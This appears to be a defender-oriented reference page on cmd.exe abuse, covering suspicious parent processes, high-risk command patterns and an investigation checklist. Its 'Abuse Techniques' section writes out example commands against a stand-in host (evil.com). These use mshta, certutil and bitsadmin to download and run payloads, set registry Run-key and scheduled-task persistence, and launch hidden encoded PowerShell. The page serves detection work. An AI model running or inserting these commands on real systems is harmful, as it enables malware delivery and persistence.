High RiskWindowsLegitimateCommonly Abused
cmd.exeSYSTEM UTILITY

cmd.exe - Windows Command Interpreter Security Analysis

cmd.exe is the **Windows Command Interpreter** providing command-line access to the operating system. It is a **critical LOLBin** heavily abused for execution, payload delivery, and persistence. Virtually every attack chain uses cmd.exe at some point.

Risk Summary

HIGH priority. cmd.exe is used in nearly every attack. Focus on: unusual parent processes, encoded commands, network download attempts, and persistence mechanisms.

Overview

What is cmd.exe?

cmd.exe is the Windows Command Interpreter (Command Prompt).

Security Significance

  • Universal Abuse: Used in virtually every attack
  • LOLBin: Living-off-the-Land Binary
  • Payload Delivery: Downloads and executes payloads
  • Persistence: Establishes persistence via registry/tasks

Normal Behavior

Normal Behavior

Expected Parents

ParentContext
explorer.exeUser launches CMD
services.exeService execution
svchost.exeScheduled tasks

Suspicious Parents

ParentRisk
winword.exeCRITICAL - Macro execution
excel.exeCRITICAL - Macro execution
outlook.exeCRITICAL - Email exploit
iexplore.exeHIGH - Browser exploit

Common Locations

C:\Windows\System32\cmd.exeC:\Windows\SysWOW64\cmd.exe

Suspicious Indicators

Legitimate vs Suspicious

SUSPICIOUS PATTERNS

Parent:      Office apps, browsers
Command:     /c powershell, /c certutil
             /c bitsadmin, /c mshta
Network:     Download attempts

High-Risk Commands

PatternRisk
cmd /c powershell -encCRITICAL
cmd /c certutil -urlcacheHIGH
cmd /c bitsadmin /transferHIGH
cmd /c echobase64 decode

Abuse Techniques

Attack Techniques

Technique #1: Payload Execution

cmd /c powershell -nop -w hidden -enc [base64]
cmd /c mshta http://evil.com/payload.hta

Technique #2: Download and Execute

cmd /c certutil -urlcache -f http://evil.com/mal.exe c:\temp\mal.exe && c:\temp\mal.exe
cmd /c bitsadmin /transfer job http://evil.com/mal.exe c:\temp\mal.exe

Technique #3: Persistence

cmd /c reg add HKCU\...\Run /v Malware /d payload.exe
cmd /c schtasks /create /tn "Update" /tr payload.exe /sc onlogon

Remediation Steps

Remediation

  1. Capture command line
  2. Identify malicious payload
  3. Check for persistence
  4. Remove downloaded files
  5. Hunt for lateral movement

Investigation Checklist

Investigation Checklist

  • Verify cmd.exe path (System32)
  • Review parent process
  • Analyze command-line arguments
  • Check for download activity
  • Review child processes
  • Look for persistence mechanisms

MITRE ATT&CK Techniques

Last verified: January 18, 2026